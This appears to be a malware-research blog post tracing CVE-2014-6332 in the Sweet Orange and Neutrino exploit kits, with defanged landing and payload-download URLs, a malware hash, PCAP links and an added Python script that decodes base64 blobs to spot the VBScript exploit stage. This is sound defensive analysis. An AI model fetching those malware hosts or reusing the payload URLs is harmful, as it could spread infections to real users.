For this CVE, refer to:
http://technet.microsoft.com/security/bulletin/MS14-064

The first encounter I had with this CVE in an exploit kit was in the Sweet Orange of the actor pushing DarkShell via compromised KR websites. The landing provided by @MalwareSigs on 2014-11-19 already contained CVE-2014-6332.


So this actor:
DarkShell pushed by Da Gong via CVE-2014-0515
2014-09-28
whom we saw moving to Sweet Orange:



Sweet Orange :

The URL patterns are different, but at a given time the modifications are similar on both.


Da Orangade firing CVE-2014-6332 and DarkShell Call back
2014-11-19
GET http://98.126.249 .92:82/index.html
200 OK (text/html)

Sweet Orange Landing
2014-11-19
A replace, then a base64 decode of the second base64 blob, and we have:

CVE-2014-6332 in Sweet Orange
2014-11-19
GET http://v.krtedun .com/sum.exe - DarkShell - fc1a3c9fc7a80e80109f1e2a32e2b057
200 OK (application/octet-stream)

Here is a more "standard" Sweet Orange:

CVE-2014-6332 fired by Sweet Orange - And Betabot call back.
2014-11-21
File: you'll find a PCAP illustrating this here:
http://www.threatglass.com/serve_pcap/498fe35b94145153f51c51f66abe42af/20141121
from http://www.threatglass.com/malicious_urls/volumebass-com-2014-11-21 (in this pcap the CVE-2014-6332 code is in the first b64 blob).
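The "replace, then base64 decode" step described for the Sweet Orange landing above, together with the remark that the CVE-2014-6332 code sits in the second blob in one capture and in the first blob in the ThreatGlass one, can be scripted for triage. The Python below is an added example written for this post; it is not the author's code and not anything taken from the exploit kit. The substitution tables it tries, the marker strings it uses to recognise the VBScript stage (the bug is reached through ReDim Preserve on a VBScript array), and the sample landing page it runs on are all constructed assumptions, since the post shows no landing-page source.

```python
import base64
import binascii
import re

# Strings expected in the decoded VBScript stage of CVE-2014-6332 (the bug is
# reached through ReDim Preserve on a VBScript array). Assumed markers chosen
# for this example; the post itself shows no landing-page source.
CVE_2014_6332_MARKERS = ("vbscript", "redim preserve")

# "Replace" steps to undo before decoding. The post does not say which
# characters Sweet Orange swapped, so every table here is an assumption.
REPLACE_TABLES = (
    {},                              # plain base64, nothing to undo
    {"-": "+", "_": "/"},            # URL-safe alphabet swapped in
    {"!": "+", "*": "/", "@": "="},  # arbitrary custom swap
)

# Long runs of characters from the base64 alphabet plus the swapped symbols.
BLOB_RE = re.compile(r"[A-Za-z0-9+/=_\-!*@]{40,}")


def extract_blobs(html):
    """Return the base64-looking runs of the page in document order."""
    return BLOB_RE.findall(html)


def decode_blob(blob):
    """Undo each candidate replace, then strict base64; first decodable text wins."""
    for table in REPLACE_TABLES:
        candidate = blob
        for src, dst in table.items():
            candidate = candidate.replace(src, dst)
        try:
            raw = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            continue
        return raw.decode("latin-1")
    return None


def find_cve_2014_6332(html):
    """Return (blob index, decoded text) of the first blob carrying the markers."""
    for idx, blob in enumerate(extract_blobs(html)):
        text = decode_blob(blob)
        if text is None:
            continue
        lowered = text.lower()
        if all(marker in lowered for marker in CVE_2014_6332_MARKERS):
            return idx, text
    return None, None


# Constructed sample landing page, NOT a real Sweet Orange capture: a harmless
# first blob, then a skeleton of the VBScript stage (markers only, not a
# working trigger) base64-encoded and passed through the URL-safe swap.
FILLER_BLOB = base64.b64encode(b"<p>" + b"welcome to our site " * 4 + b"</p>").decode()
VBS_SKELETON = (
    '<script language="VBScript">\r\n'
    "Dim aa()\r\n"
    "ReDim aa(5)\r\n"
    "ReDim Preserve aa(a2)\r\n"
    "</script>"
)
SECOND_BLOB = (
    base64.b64encode(VBS_SKELETON.encode()).decode()
    .replace("+", "-").replace("/", "_")
)
SAMPLE_HTML = (
    '<html><body><div id="a">' + FILLER_BLOB + "</div>"
    '<div id="b">' + SECOND_BLOB + "</div></body></html>"
)

if __name__ == "__main__":
    index, decoded = find_cve_2014_6332(SAMPLE_HTML)
    print("CVE-2014-6332 stage found in blob", index)
    print(decoded)
```

On a real capture you would feed `find_cve_2014_6332` the body of the `200 OK (text/html)` landing response carved from the PCAP, and add the kit's actual substitution to `REPLACE_TABLES` once you have worked it out by hand. The marker test is a triage heuristic to tell which blob holds the VBScript stage, not a detection signature.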

Neutrino :

Neutrino firing CVE-2014-6332 embedded in a Flash file
2014-11-20

Please refer to this post: Neutrino : The come back !

Read More :

Neutrino : The come back ! - 2014-11-20
IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows - 2014-11-11
http://technet.microsoft.com/security/bulletin/MS14-064